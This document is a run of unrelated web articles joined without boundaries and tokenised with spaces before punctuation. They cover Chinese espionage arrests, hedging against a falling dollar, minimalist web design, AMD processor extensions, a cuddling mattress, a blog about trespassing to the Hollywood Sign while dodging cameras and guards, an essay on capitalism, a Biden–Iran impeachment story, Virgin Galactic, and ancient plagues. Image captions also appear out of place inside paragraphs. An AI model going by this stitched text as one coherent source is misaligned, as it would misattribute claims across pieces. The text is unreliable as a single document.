Last July , as they drove to Dulles airport in a rented car , Kuo Tai - sheng reached over and stuffed a wad of cash in the shirt pocket of Gregg W. Bergersen .
That is the Federal Bureau of Investigation 's ( FBI ) version of events , in any case .
They had been tracking Mr. Bergersen , a Defense Department weapons policy analyst , and Mr. Kuo , a furniture dealer and naturalized US citizen living in New Orleans , for months , searching their hotel rooms , wiretapping phone calls , even secretly copying the contents of Kuo 's computer hard drive .
According to conversation transcripts from a Justice Department affidavit unsealed Monday , Bergersen said , after receiving the money : " Now the other information I gave you , I 'm very , very , very reticent to let you have it , because it 's all classified . "
He continued , " But I will let you see it ... and you can take all the notes you want . "
Bergersen , Kuo , and a third alleged conspirator , Yu Xin Kang , were arrested on espionage charges Monday .
In a separate case , former Boeing engineer Dongfan " Greg " Chung was also arrested the same day and charged with illegally passing company trade secrets .
These cases suggest that Chinese espionage has become one of the most pervasive counterintelligence problems in the United States , say US officials and outside analysts .
Beijing 's spying style is difficult to counteract , some experts say .
China does not utilize a few , highly placed , and deeply embedded agents as the Soviet Union did .
Instead , it employs a vast , decentralized network of Chinese and China - born students , business people , and scientists , and acquires information one small bit at a time .
" China 's espionage activities are the single greatest threat to US technology and strain the US counterintelligence establishment , " said Heritage Foundation analyst Larry Wortzel , chairman of the US - China Economic and Security Review Commission , at a Jan. 29 House hearing .
When it comes to charges of Chinese espionage , it is important to remember that the US has had some high - profile cases fall apart .
In 1999 , Los Alamos National Lab scientist Wen Ho Lee was charged with stealing nuclear secrets for China .
In 2000 , all but one charge was dropped .
Many Chinese - Americans felt he was being singled out because of his ethnic heritage .
The charge sheets in the two new cases , however , contain details that paint pictures of specific and continued spying for the Chinese government .
Bergersen worked at the Defense Security Cooperation Agency based in Arlington , Va .
He is charged with passing plans and information related to US military sales to Taiwan to Kuo and his associate Kang , a woman who worked for Kuo 's furniture business .
According to US law enforcement , Bergersen passed some of this information on when the two met in Las Vegas last April .
FBI agents later searched Kuo's hotel room and found unclassified US military documents .
Kuo was allegedly in contact with a Chinese government contact the FBI describes as a " PRC official . "
In the second case , Mr. Chung is a naturalized US citizen and a longtime Rockwell and Boeing engineer who worked on the space shuttle program .
Chung would receive specific requests from China for information related to his work , officials charged .
He would take the relevant documents when he went home , according to an indictment originally brought by a grand jury last October .
Several ways to hedge against falling dollar
A worker at a travel agency adjusts the U.S. Dollar rate against British Sterling at the window display of a foreign currency exchange board in central London December 1 , 2006 .
Sterling bulls eyed the $ 2 psychological level on Friday after the pound hit a 14 - year high for a second day against a battered dollar , as the prospect of a narrowing U.S. interest rate gap continued to haunt the greenback .
REUTERS / Toby Melville ( BRITAIN ) less A worker at a travel agency adjusts the U.S. Dollar rate against British Sterling at the window display of a foreign currency exchange board in central London December 1 , 2006 .
Sterling bulls eyed the $ 2 ... more Photo : TOBY MELVILLE Photo : TOBY MELVILLE Image 1 of / 1 Caption Close Several ways to hedge against falling dollar 1 / 1 Back to Gallery
The dollar continued its slide against major world currencies last week , hitting a 14 - year low against the pound and a 20 - month low against the euro Thursday .
That 's bad for Americans who want to travel overseas or buy imported goods but great for investors who own overseas assets .
The dollar has been declining against most major currencies since mid-2001 , except for an unexpected rally in 2005 .
Although nobody knows where the dollar will bottom out , experts agree that currency cycles usually take many years to play out and often go to extremes before turning around .
If your portfolio has nothing but U.S. investments , it might make sense to have some exposure to non-dollar assets .
MBA BY THE BAY : See how an MBA could change your life with SFGATE 's interactive directory of Bay Area programs .
Foreign currencies " make excellent diversifiers " because they do n't correlate well with U.S. stocks and bonds , says Morningstar fund analyst Arijit Dutta .
There are many ways to gain exposure to foreign currencies , from foreign stock and bond funds to currency funds and foreign certificates of deposit .
Here 's a look at some , from tame to adventurous .
-- Buy currency .
Of course , one way to invest in currencies is simply to go to a bank that handles foreign money and change your dollars into euros , pounds or yen .
I 'm not recommending this because the transaction costs are steep , the currency wo n't earn interest and you 'll have to store it somewhere .
-- Foreign CDs .
Everbank , an online bank in Jacksonville , Fla. , offers CDs denominated in about 15 foreign currencies .
The minimum investment is $ 10,000 and terms range from three to 12 months .
" Say you want to buy euros .
You open an account with Everbank and give us your $ 10,000 , " says Chuck Butler , president of Everbank World Markets .
" We take your dollars and convert them to euros .
When the term ends , we take the whole lot of euros -- principal and accrued interest -- and covert them back into dollars at a rate that is within 1 percent of the spot rate . "
That 1 percent ( or less ) represents Everbank 's fee .
You pay it each time you buy or sell a CD .
If you bought currencies yourself , you 'd pay considerably more .
Everbank 's CD interest rates depend on the country and the term , but range from zero for Japanese yen CDs to 11.5 percent for CDs denominated in the highly volatile Icelandic krona .
Euro CDs are paying 2 to 2.5 percent .
Everbank also offers foreign currency savings accounts , which offer daily liquidity and smaller minimums but do n't pay interest .
Everbank deposits are insured by the Federal Deposit Insurance Corp. , which would repay investors if the bank went under .
But they are not insured against currency losses .
-- Foreign stock funds .
When you buy foreign stocks ( individually or through a fund ) , your return depends on what happens to the price of the stocks in their home market and what happens when those foreign profits or losses are converted back into dollars .
Suppose you are a U.S. fund manager and you buy stock in British Airways on the London Stock Exchange .
To do so , you must convert dollars into British pounds .
Now suppose the price of British Airways rises and you sell the stock for a profit .
When you convert your pounds back into dollars , you will have a currency gain if the dollar has fallen and a currency loss if the dollar has risen .
The currency gain or loss will add to or subtract from your British Airways profit .
In recent years , many international stock funds have posted stellar returns , thanks in part to the generally weakening dollar .
Some funds try to reduce or eliminate currency risk by engaging in hedging strategies .
If your fund hedges , you might have little or no foreign currency exposure .
But " if you own a lot of non -hedged foreign stock funds , that may be all the exposure you need , " Dutta says .
To find out if your fund is hedged , check its Web site or call customer service .
-- Foreign bond funds .
Another way to gain currency exposure is to buy a fund that invests in foreign bonds .
Your return will depend mainly on how much interest the bonds pay , plus or minus currency gains or losses .
Like all bond funds , foreign bond funds also are subject to interest rate risk .
If interest rates go up in the countries where the fund is invested , the bonds could lose value , resulting in capital losses .
If interest rates go down , the bond values could rise , resulting in capital gains .
Like stock funds , some bond funds hedge their currency risk .
If you want currency exposure , buy an unhedged fund .
To see the impact of currency risk , look at the Pimco Foreign Bond fund , which comes in a hedged and unhedged version .
In 2005 , when the dollar mostly rose , the hedged version gained 5.3 percent while the unhedged version lost 9.5 percent .
In 2006 , with the dollar generally falling , the hedged version has gained just 3.3 percent while the unhedged version has gained 8.5 percent as of Thursday .
In the foreign - bond category , Morningstar recommends Pimco Foreign Bond Unhedged and Pimco Global Bond Unhedged and , for no -load investors , T. Rowe Price International Bond .
A note about foreign funds :
For maximum overseas exposure , choose a foreign or international fund .
Funds with global or world in their names sometimes invest significant stakes in the United States .
-- Hard currency funds .
A hard currency fund is similar to a foreign bond fund except that it invests in short - term money market securities , which virtually eliminates interest - rate risk .
It is designed to deliver a pure play on the dollar .
The two funds in this area are Franklin Templeton Hard Currency , started in 1989 , and Merk Hard Currency , launched in mid-2005 .
You can think of these as foreign money market funds , with one important exception .
Money market funds seek never to lose value .
A hard currency fund can lose principal if the dollar soars .
The Franklin fund posted negative returns in five of the six years from 1996 through 2001 and has made money since then , including double - digit returns in 2002 and 2003 .
You 'd never see that kind of volatility in a regular money market fund .
These funds move assets around the world in search of currencies that are undervalued against the dollar .
Today , the Merk fund is invested mainly in the euro and other European currencies .
It is up 12.3 percent this year as of Thursday .
The Franklin fund is invested more heavily in Asian currencies and is up 9.6 percent .
The Franklin fund is a load fund sold primarily through brokers , who receive commissions .
Merk fund is no-load , but its 1.3 percent expense ratio is slightly higher than the Franklin fund 's 1.2 percent .
I asked Michael Hasenstab , who manages the Franklin Hard Currency and the Templeton Global Bond Fund , which of his two funds would be better for an individual investor .
" The global bond fund is more diversified , " he says .
" It has investment and sub - investment grade exposure .
It has short and longer maturities , although the average is fairly short right now , around 2.5 years .
It has been able to generate consistent returns over the years independent of exchange rate movements .
It 's more of a core holding . "
The hard currency fund , he says , " is more of a pure play on currencies .
It has a bit more of a tactical ( or short - term ) element . "
-- Index funds .
Two fund groups that cater to speculators -- Rydex and ProFunds -- have introduced mutual funds that use derivative securities to track the U.S. dollar index .
This index measures the value of the dollar against six major world currencies .
Each group has one fund that tries to replicate the index ( for investors who think the dollar is going up ) and one fund that matches the inverse of the index ( for those who want to bet against the dollar ) .
The big difference is that Rydex uses leverage to deliver twice the daily performance of the index .
If the dollar index rises 1 percent in one day , the Rydex Dynamic Strengthening Dollar fund should go up 2 percent and the Rydex Dynamic Weakening Dollar index should drop 2 percent .
Because of compounding , this 2 - 1 ratio will not always hold up , especially if the dollar is changing direction frequently .
Rydex decided to leverage the funds because " we discovered the dollar was pretty low volatility as an asset class .
We thought , if somebody wants to play currency moves , some magnification would probably be useful , " says David Reilly , director of portfolio strategy with Rydex Investments .
All four of these funds premiered in 2005 , so it 's hard to know how they will fare over time , but they 're moving in the right direction .
As of Thursday , the U.S. dollar index was down 8 percent year to date .
The Rydex strengthening dollar fund was down 8 percent and the weakening dollar fund was up 12.3 percent .
The tamer ProFunds Rising U.S. Dollar fund was down 5.6 percent and the ProFunds Falling U.S. Dollar fund was up 9.8 percent .
The Rydex funds can be purchased through a broker with a load or through some fund supermarkets ( minimum investment $ 1,000 ) without a load .
The annual expense ratio is 1.7 percent .
The no-load ProFunds require a minimum investment of $ 5,000 .
The expense ratio is 1.55 if you buy shares yourself or 2.55 percent if you go through a full - service broker or adviser .
-- Exchange - traded funds .
Rydex has rolled out a lineup of exchange - traded funds that invest directly in foreign currencies .
These funds trade throughout the day on the New York Stock Exchange , just like stocks .
The funds are not leveraged and should track their currencies on a roughly 1 - 1 basis .
The first one , which premiered a year ago , is the Rydex Currency Shares Euro Trust .
It 's up 14 percent year to date .
The trust buys euros , which are held in a London bank .
The account earns a bit of interest , which is passed along to investors after the fund 's expenses ( 0.4 percent a year ) are taken out .
Rydex offers newer exchange traded funds denominated in Australian and Canadian dollars , British pounds , Mexican pesos , Swiss francs and Swedish krona .
Reilly says both types of Rydex currency funds are " tactical " investments designed for people who have a definite view about the dollar 's direction .
" Strategic assets are stocks , bonds , real estate and commodities .
If you look at their price behavior over time , they tend to trade up .
From a long - term standpoint , you want to have them in your portfolio , " he says .
" Currencies do n't trend up like that , " he says .
They tend to move up for many years , then down for many years .
As a result , currency funds are not designed to be a permanent part of a portfolio .
Minimalism is one of our favorite styles of web design .
A well - designed website with a minimalist style may look simple , but they ’re not always easy to design .
Many of us have an appreciation for an attractive , yet simple , design .
And since this is the case , I ’ve taken a look at what makes minimalistic designs successful and I ’d like to share my thoughts here .
I know that not everyone likes these types of designs , so your opinions of what is good design may will differ from mine .
After I cover what I think makes a successful minimalist website , we ’ll go over 25 of my favorite examples of minimalist websites .
Plenty of White Space
One of the keys to minimalism in design is effective use of white space and a distinct lack of clutter .
Of course white space does n’t have to be white , it simply refers to open space in the design , whatever color that may be .
Clutter can have several negative impacts on visitors .
Most importantly , visitors have a hard time focusing on the most important parts of a page if it is cluttered .
White space makes the contents of the page easier to digest .
Effective Typography
Creating a website with very few images and extra items is not that difficult , but creating one that looks good can be more of a challenge .
Many of the best mimimalistic designs compensate for using less photos and graphics by making better use of typography .
Excellent typography is capable of replacing many of the visual benefits that are lost by not using a lot of images .
For this reason , typography is even more critical in a minimalistic design than it is for other styles of design .
Maximizing the Impact of Images
Effective minimalistic designs rely on making a strong impact with the few images and graphics that they do use , rather than making an impact by using a lot of them .
It ’s quality vs. quantity in a way .
By using fewer images , those that are used are able to be more effect and draw more attention from visitors .
The added whitespace also helps these images and graphics to stand out .
Effective Use of Color
Color choices are important for any design , but more so for minimalistic designs .
With less busyness on the page , the color combinations play a larger role in the look of the site .
There is nothing to hide poor color choices in a minimalistic design .
Pages and sites that use a lot of images and photographs will get more color from these elements , a luxury that minimalistic designs do not have .
Color can be a very powerful method for helping particular content to stand out .
The simplicity of a minimalistic design allow color choices to have more of an impact .
Earlier I mentioned the importance of typography and how it can help to replace the need for images .
Effectively combining color and typography can have significant results .
Clarity of Purpose
One of the biggest reasons for using a simple design is that it is easier for visitors to quickly see the purpose of a website or a particular page , rather than being distracted by excessive things that are going on as well .
With this approach you have better control over the message that is portrayed to visitors .
Elimination of Extras
Minimalism is obviously a lack of anything that is not necessary .
By getting rid of what is not needed , what is left has more of an impact on visitors .
Focal Point
Many websites have so much going on that it ’s difficult for visitors to know what is the focal point of the site , or what is most important .
Simple websites have an advantage in that they can more effectively direct the visitor ’s attention to the most important content of the page .
Below are 25 of the best crafted minimalist website designs :
For more inspiration , see :
AMD is proposing a new set of x86 processor extensions .
As Internetnews.com reported last week , the SSE5 are targeting markets where AMD sees room for performance improvement .
The SSE5 extensions cover three primary areas : high - performance , compute - intensive applications , such as financial simulation and life sciences ; multimedia applications , including high - definition video encoding and image processing ; and security applications , such as secure transactions and hard - drive encryption .
Sleeping entwined with another is a novel concept , but there 's always the problem of that extra arm .
Where does one put it ?
Mehdi Mojtabvi's Love Mattress offers a simple solution for the chronic limp arm that often results from sleeping while wrapped in a prolonged embrace .
Mojtabvi has studied the embracing styles of couples while in bed and has confirmed what we all know -- that having your arm flattened under your partner 's body for prolonged periods of cuddling is n't exactly comfortable .
What 's more , it may even prove detrimental to your health !
Technically speaking , it puts abnormal pressure on the muscles , blood vessels and nerves , and over time can result in a condition termed " radial neuropathy , " whose symptoms include weakness in wrist dorsiflexion and finger extension .
Finally , an answer to this age - old predicament has arrived !
Winner of the red dot design concept award in 2007 , the idea of the Love Mattress is simple : A solid unit makes up the middle portion of the bed , with several adjoining strips of foam connected at either end .
Between these slats one can drop their shoulder or arm , allowing for a much more comfortable sleeping position while remaining all snuggled up .
Each polyurethane - injected foam strip is covered with a smooth fabric which allows for easy sliding , and after assembly the whole mattress can be covered with a standard bed linen .
Not only is it good for sharing with another , but it also works for other positions , like stomach sleeping , where you can let your foot dip into the gaps .
So , say goodbye to that slack arm .
Right now it 's still only a concept , but if the Love Mattress hits production mode you 'll be good to go for hours of fine spooning action .
Found at red dot ( site page no longer available ) .
A few weeks ago , I decided to CONQUER the Hollywood Sign on Mount Lee .
I ’ve been eyeing that mountain ever since I first set foot in Los Angeles , and it seemed like as good of a time as any to show that mountain who ’s boss .
The normal approach
Getting to the Hollywood sign is n’t too tough if you want to take the touristy approach .
It ’s a cinch to drive up to within a half mile of it , take some snapshots , and be on your way .
I ’ve done it a few times before .
( If you ’re wondering how , just head north on Beachwood Drive from Hollywood , through some windy neighborhood streets , and keep heading up .
I believe you have to take a left at some point , but basically head toward the sign and do n’t go downhill . )
Here ’s a picture I took this past summer from one of the roads near the sign itself :
There are also several well - worn hiking trails that head up the East side of the mountain from Griffith Park .
( This Etreking.com page will tell you all about it . )
Security
Technically , you ’re not allowed to actually go up to the sign itself .
It ’s illegal trespassing , and the top of the mountain has a complex ( including that famous radio tower ) that is protected with tall barbed - wire fences , security guards , and hidden cameras .
We ’re talking a state - of - the - art security system :
“ Panasonic Systems designed , engineered , fabricated and installed a cutting - edge security network comprised of a ten - camera closed circuit television surveillance system ( CCTV ) , external alarms , microwave - triggered motion detectors and a bilingual audio warning system …
Full - streaming color video images are now fed by all 10 remote cameras through fiber optic lines to the City of Los Angeles Parks and Recreation Security Headquarters , where rangers can monitor all of the cameras simultaneously . ”
( Not to mention the pack of vicious bloodhounds , and the cybernetic security guards with rayguns and jetpacks they ’ve got up there as well . )
So suffice to say , it ’s a bit be a challenge to get up to the sign without getting caught .
Hiking up the back side
But I like challenges !
I was n’t going to heed all those “ No Trespassing under penalty of law ” signs — I was going to go right up and touch those giant corrugated steel letters , and smile for the cameras .
And I also was n’t going to pussy out and take the streets or the marked trails to the top of the mountain either .
To make things interesting ( and perpetually more difficult ) , I decided to blaze my own trail up the untamed West side of the mountain , to the top of Cahuenga Peak , and then follow the ridge over to the top of Mount Lee .
It ’s only about three miles total , but considering the steepness , the crumbly rocks and dirt , and the sheer amount of prickly brush in the way , it is no easy hike .
It ’s one of those ones where you take five steps forward and slide back down four in a little rockslide , meanwhile getting cut to shreds by all the bushes and trees .
View Larger Map
I started at the Oakwood Apartments in Burbank , where I lived for a semester when I was in the Ithaca College Los Angeles program .
The Oakwoods are home to many things — child actors , porn stars , unheard of levels of infidelity , and the lost soul of “ Super Freak ” singer Rick James .
( In fact , ICLA legend has it that he died in my very apartment at the Oakwoods . )
The Oakwood complex also , conveniently , is right on the back side of Cahuenga Peak .
You can literally walk up the back parking lot and just keep going up until you reach the top .
Which is exactly what I did .
The first section is really steep , but because of some forest fires two years ago , most of the brush and bushes were burned away .
There ’s also an access road to reach a bunch of powerlines part way up the hill that I took for a while .
You can see it pretty well on the Google satellite image .
Once you get to the other side of the access road , it starts to get tough — it ’s a whole lot steeper , and full of brush and rocks like I mentioned before .
I ca n’t give you any advice on how to get up to the top , other than make sure you do n’t have anyone beneath you , because they will most certainly get hit by a falling rock … or maybe even you yourself when you fall to your death .
I would recommend wearing long pants and sleeves , because you will get cut to pieces .
( My legs are still in shreds from that hike , two weeks later . )
From this side of the hill , you get a really nice view of the Hollywood Reservoir , a giant artificial lake that you would not expect to find nestled among the urban sprawl in Hollywood .
Unfortunately , it ’s tough ( and illegal ) to get right up to the water , due to some tall fences and security cameras , but at some point , I hope to pay the reservoir a visit as well .
After the grueling , hands - and - knees climb to the top of the ridge , it really levels out , and it ’s a relatively flat and easy walk along the ridge over to Mt. Lee .
Along the way , you reach the summit of Cahuenga Peak , which is the highest point in the area .
I snapped a picture of the Geographical Survey Marker at the top , but I could n’t make out the elevation because it was too faded .
At the top , I saw a lot of really awesome hawks / condors / eagles .
( I ’m no good at identifying birds , but they were brown and beige , and had a big wingspan . )
I also saw some deer from a distance , further down the hill .
And after a little while , I started to get a really good view of the Mt. Lee radio tower and the complex at the top .
When I was within a few hundred yards of the radio tower , I crested a rock and there it was — the back of the Hollywood Sign !
It ’s a really great view of all of Los Angeles , and you can see everything from Downtown to the ocean .
I also saw the paved access road that leads up the complex at the top and the barbed wire fence .
There was a pick - up truck with a worker going up , so I knew to avoid the road .
I started cutting down the steep front side of the mountain to the slope in front of the sign itself , so that I could avoid the fenced - in area .
The Hollywood sign itself is NOT fenced in , because the fence extends around the back side of the mountain where all of the roads and foot trails lead , but the steep and nearly inaccessible front side of the mountain is open .
I scrambled through the brush and loose dirt on the slope in front of the sign , keeping low to make sure that I was n’t too conspicuous .
There are several very visible security cameras on the letters of the sign themselves , and I did my best to stay low .
After a few minutes , though , I figured I would just go for it .
I went right up to the letters themselves , waved to one of the cameras , and touched the corrugated steel .
There are ladders that go up the scaffolding structure that holds them in place , and I was tempted to climb up , but decided not to press my luck .
The letters are huge to be sure — probably around 50 feet tall — though they were actually a bit smaller than I expected .
I had been told that there was an encampment of bums and hippies that lived right under the sign , but I saw no evidence of that .
However , there were several beer cans and bottles , and off to the side , the remnants of a campfire , so people had definitely been up there before .
I am absolutely sure that I got filmed by multiple security cameras , but no guards or workers approached me .
There was also a helicopter that flew out from the complex on the top of the mountain — right over me — but if they saw me , they did n’t do anything about it .
I ’ve heard that the police get called when someone is spotted , and then they usually intercept trespassers when they walk down the access road after leaving the sign .
I snapped a few more pictures , spent a few more minutes walking the entire length of the sign , and then decided to head on my way .
To avoid getting caught on the access road and trails that loop around the back of the mountain , I opted to go down one of the steep and precarious gulleys down the front side of the peak .
The front of the mountain is inaccessible to vehicles , and I figured it was pretty unlikely that a cop or guard was going to chase me down on foot .
This was by far the hardest part of the hike , because the brush was incredibly thick and overgrown here , having not been burned in the fires two years earlier .
It was so steep that there were times when I would lose my footing and tumble down quite a ways before I could come to a stop .
On several occasions , I would get to a point where I could n’t make it through a section of brush , and would have to turn back to find another route .
Frustrating , to say the least , and my legs and arms got extremely cut up .
Eventually , I came out in some millionaire ’s back yard , who had the highest - up house on the front side of the hill .
From here , I was able to take the roads and streets back down the hill , toward Burbank .
It was more than an hour of walking from that point , but it was along paved roads and very easy .
Along the way , I passed by a really cool overflow dam on the edge of the Hollywood Reservoir , that I climbed up .
Here ’s a picture I took of myself as I climbed up one of the drainage ditches :
All in all , it was a fun hike .
I ’m glad I finally got around to doing it , two years after I originally came up with the idea .
( The Facebook picture alone was worth the hike . )
My Next Adventure
What adventures are in store next in Los Angeles ?
I ’m going to raft down the entire length of the polluted concrete gulch that is the Los Angeles River , of course !
That puppy runs right by my window in Sherman Oaks , and winds 22 miles through LA down to Long Beach , where it empties into the Pacific .
Normally it ’s only got a trickle of a few inches of water , with the occasional styrofoam cup or Taco Bell wrapper to break the monotony ; but when it rains , HOO BOY , does it flow !
The normally tame LA River becomes a raging torrent , and the styrofam cups and taco wrappers are instantly replaced with shopping carts , small children and mobile homes .
And it is that raging torrent that I ’d like to conquer next .
You can view the rest of the photos from my hike in this Flickr photo album .
Back to Rants and Raves
Why People Hate Capitalism
By Bruce of Stone Marmot
June 27 , 2008
Capitalism is the most democratic economic system there is , for every time you spend a dollar , or refrain from spending a dollar , you are casting a vote .
That is why so many people hate capitalism , because , with capitalism , the world people live in is the sum total result of each of their individual actions .
In other words , capitalism makes people responsible for their own actions , whether they like it or not .
Most people subscribe to a different philosophy , a philosophy that is common to Republicans and Democrats , liberals and conservatives , blacks and whites , Christians and Moslems and Jews , environmentalists and industrialists , virtually every social - political group you can think of .
That common philosophy is scapegoatism , which basically states that all the world 's problems are someone else 's fault .
People refuse to see how they are contributing to the very problems they are condemning .
If each of us would clean up our own acts , many of the problems in this world would be significantly reduced , if not eliminated .
For example , the reason we have nuclear power plants is because people voted for them .
" What ? ! " you respond , " I never voted for nuclear power plants ! "
Oh , yes you did !
Not on a public ballot , but every time you turned on an electric appliance and every time you paid your electric bill .
You cannot demand absolutely unlimited electricity with absolute 100 % reliability at dirt cheap cost and at the same time deny every possible means of generating and transmitting that electricity .
And for every possible means of generating electricity that you can think of , there are a number of people out there who can find a number of reasons for opposing that generation means .
The electric power industry is simply trying to use the most cost effective power generation means that will meet the demanded supply and reliability requirements .
But , unfortunately , they are aiming at a moving target .
Nuclear power was once proclaimed as the ultimate power source , but , after significant government and industry investment , public dissent finally made it uneconomic to continue pursuing .
Hydroelectric power was once touted as a plentiful , nonpolluting , renewable source of electricity , but few hydroelectric plants have been built in the US in the past 20 years and many people are demanding that many of the ones that do exist be torn down .
Wind power is the latest attempt to satisfy these public demands and concerns and already there is a ground swell of opposition is rising against it ( The main environmental concern is that windmills kill birds , even though the number of birds killed by windmills is less than one per tower per year whereas the number of birds killed by domestic cats in Wisconsin alone is about 39 million per year ) .
If you really do n't like these means of generating electricity , then quit using electricity , or at least dramatically reduce your consumption ( which is easy for most Americans , if they really cared , with methods to be discussed in future articles ) .
After all , these facilities can't operate without your money .
" Yeah , but what about solar power ? " you respond .
And my response is , " How many solar panels do you have on your roof ? "
If the answer is none , then you voted against solar power .
Because of certain peculiarities in the physical properties and economics of solar power , solar power as we presently know it will never be practical for the major power companies but is still very practical for the individual home owner .
( Bandmate Sid discusses the reasons for this in the " Why Electric Utilities Avoid Solar Power " " Rants and Raves " article . )
Consequently , the only way you will ever see solar power generating most of your electricity is if you install it on your own home .
Another example :
The reason there are so many telephone solicitors is because you voted for them .
How ?
By patronizing them .
" But I never patronize telephone solicitors ! " you indignantly respond .
Never ?
What about your college alma mater calling for donations ?
Or your favorite charity ?
Or that satellite TV service that gave you free equipment and installation ?
" But it was such a good deal , " you counter .
Or the house painting service you used ?
" But I was going to get my house painted anyway and this just saved me the trouble , " you respond .
Anytime you make ANY exception and patronize ANY telephone solicitor , you have cast a vote for telephone solicitors .
You see , unlike the ballot box , capitalism is not a majority rules sort of democracy .
And in many ways , that is good , for this feature of capitalism is what has allowed such a wide diversity of goods and services and activities to proliferate in our society .
That is why we have stamp collecting , bungee jumping , rock climbing , klezmer music , and even solar power present and available in our society .
That is also why we have such technological innovation in our society .
With capitalism , we do not need a majority of the population to be interested to allow a good , service , or activity to exist and be available .
All we need is enough people who contribute enough money and effort to support any associated expenses for that good , service , or activity to exist .
But that is also bad since it allows many of the things the majority may consider undesirable to continue to exist .
For example , it only takes about one positive response in 50 to justify a telephone solicitor 's efforts .
It only takes one positive response in 1,000,000 to email spam to justify its existence .
This feature of capitalism is also one reason why so many politicians and special interest groups hate capitalism .
As long as people have the desire and the money , they can do whatever they want , irrespective of what these politicians or special interest groups desire .
Consequently , these politicians and special interest groups try to impose laws which restrict the freedom given to these people by capitalism .
Capitalism gives the general population an incredible amount of power , for how they spend their money determines what companies should stay in business , what services should exist , what features products should have .
But most people are too lazy and / or selfish to properly exercise this incredible power .
Most people feel that they can and should be able to do whatever they want and that it is up to others to make sure that all is possible and no harm is done .
This attitude is continually reinforced by our media , educational systems , and our legal system , particularly the US tort judgments .
But government and industry uses our actions and spending to determine what we really want , for what we say we want is frequently said only to win the approval of others and to make ourselves feel good , whereas our actions and lifestyles , as indicated by how we spend our money , are usually more indicative of what we truly desire .
( This is the main point of our songs " Environmental Poser " and " I Must Be The Change . " )
So , if you are against what you perceive are wars fought for oil , then quit using oil , or at least dramatically reduce your consumption of oil products .
There are alternatives if you really look , do n't mind paying more , and can adapt your lifestyle , which you 'll do if you REALLY care .
If you do n't like Microsoft or think Mr. Gates is too rich , then quit using Microsoft products .
Again , there are alternatives .
If you think professional athletes ( or movie stars , or rock stars , or whoever you 're presently jealous of ) make too much money , then quit supporting them by attending their events , watching their shows on television , and buying their products and those they endorse .
Whatever there is in this world that you think needs to be changed , first honestly examine your own life to see if and how you are contributing to the very problem you are condemning .
Once you clean up your life to minimize your contribution to the problem , then you can ask others to make a similar change in their lives .
It is much easier to change your own life than to make others change their lives .
By the same token , if you see someone , particularly a celebrity , demanding a change in this world , examine that person 's life to see if it is consistent with the change they are demanding .
In many cases , these celebrity " causes " are just publicity stunts and these people do n't and are n't willing to make the same sacrifices and commitments that they demand of others .
Until individuals realize the power of their pocketbook vote , any change for the better will be very slow .
So , do n't be a hypocrite , align your lifestyle and spending habits with those beliefs you profess .
Any real , permanent change has to start with the individual .
Back to Rants and Raves
© 2003 -2020 Stone Marmot Enterprises , all rights reserved .
Biden 's warning to Bush : Bomb Iran and face impeachment David Edwards and Nick Juliano
Published : Friday November 30 , 2007
del.icio.us
Print This Email This Sen. Joe Biden , the loquacious long - shot Democratic presidential candidate , warned President Bush Thursday that he would move for impeachment if the president unilaterally authorized a military strike against Iran .
" The President has no authority to unilaterally attack Iran and ... if he does , as foreign relations committee chairman and former chairman of judiciary , I will move to impeach him , " Biden told a crowd of about 100 potential voters at a campaign stop in New Hampshire .
Biden said he is meeting with constitutional law experts and plans to send Bush a legal memo formally outlining his warning , according to Seacoast Online , which reported his comments .
The senior Delaware senator told the crowd that calls for Bush 's immediate impeachment were valid but may not have enough constitutional support to make them viable .
He added that Bush was n't the only White House figure who deserves to be booted .
" If you 're going to impeach George Bush , you better impeach Cheney first , " Biden said , garnering applause from the crowd .
On MSNBC 's Morning Joe Friday , host Joe Scarborough , a former Republican congressman , criticized Biden 's proposal .
" It is so unfortunate , that this is how we campaign now , talking about impeachment , " Scarborough said , " when you have [ Iranian president Mahmoud ]
Ahmadinejad talking about obliterating Israel , talking about obliterating the United States , talking about building nuclear weapons , how we can't stop him .
Saying just absolutely horrendous crazy things , sending Iranian forces into Iraq to kill American troops .
" And Joe Biden , who I like and respect , talking on the campaign trail about impeaching a commander in chief because of a decision that he may make against a madman , " he continued .
" And everybody knows that Ahmadinejad is a madman , and that Iran is one of the most dangerous planets on Earth . "
One assumes Scarborough meant to say " most dangerous countries on Earth . "
This video is from MSNBC Morning Joe , broadcast on November 30 , 2007 .
THE space race is set to enter a new phase with the unveiling of the design for Virgin Galactic 's SpaceShipTwo on Wednesday January 23rd .
Test flights will begin later this year .
Passengers will make short sub-orbital trips in the new machine , which might also eventually be used to carry payloads into space .
Hundreds of people have put down some $ 30 m in deposits for trips that are at first expected to cost $ 200,000 each for about five minutes defying Earth 's gravitational pull .
By Verity Murphy
BBC News
By the end of the plague Athens had lost a third of its army
The Greek historian Thucydides survived a bout of this unknown killer and left a vivid account of its symptoms , which make for frightening reading .
" People in good health were all of a sudden attacked by violent heats in the head , and redness and inflammation in the eyes , the inward parts , such as the throat or tongue , becoming bloody and emitting an unnatural and fetid breath , " Thucydides starts by saying .
But that was just the beginning - sneezing and coughing were next , then diarrhoea , vomiting and violent spasms .
Next came livid skin , covered in pustules and ulcers , and a burning , unquenchable thirst .
Scholars believe the Antonine Plague was most likely smallpox
Most died around the seventh or eighth day , but if not the disease moved to the bowels , where violent ulceration and worsening diarrhoea , combined with exhaustion , was usually enough to prove fatal .
A handful did survive , but the disease left its mark - toes , fingers , genitals and sight were often lost .
For others the legacy was an entire loss of memory , so that , as Thucydides says , they " did not know either themselves or their friends " .
The world 's first recorded pandemic had arrived .
Rome reduced
Thucydides says the disease began in Ethiopia , spreading through Egypt and Libya , then into the Greek world .
Over the next four years it killed almost a third of the Athenian population and its armed forces , along with the city 's leader and mastermind of Athenian glory , Pericles .
It is unsurprising perhaps that the word pandemic is derived from Greek - " pan " meaning all , and " demos " meaning people .
By the 2nd Century AD , the mantle of European power had passed to Rome , largely thanks to the might of its army .
10,000 people were said to be dying in Constantinople each day
But this army almost proved the civilisation 's downfall , when in AD165 , troops returning from campaigns in the east of the empire brought back a disease which killed an estimated five million people .
Known as the Antonine Plague , after Marcus Aurelius Antoninus , one of two Roman emperors who died from the disease , it killed a quarter of those who caught it .
In AD166 , the Greek physician and writer Galen travelled from Rome to his home in present - day Turkey and recorded some of the disease 's symptoms .
In his treatise Methodus Medendi , he describes fever , diarrhoea , and inflammation of the pharynx , along with dry or pustular eruptions of the skin after nine days , symptoms which has led scholars to conclude the disease was most likely smallpox .
A second outbreak occurred between AD251 and 266 , and at its height some 5,000 people were said to be dying in Rome every day .
Age - old tale
But even this extraordinary toll was surpassed when in the 6th Century AD , under the reign of the Byzantine Emperor Justinian I , a plague hit the city of Constantinople .
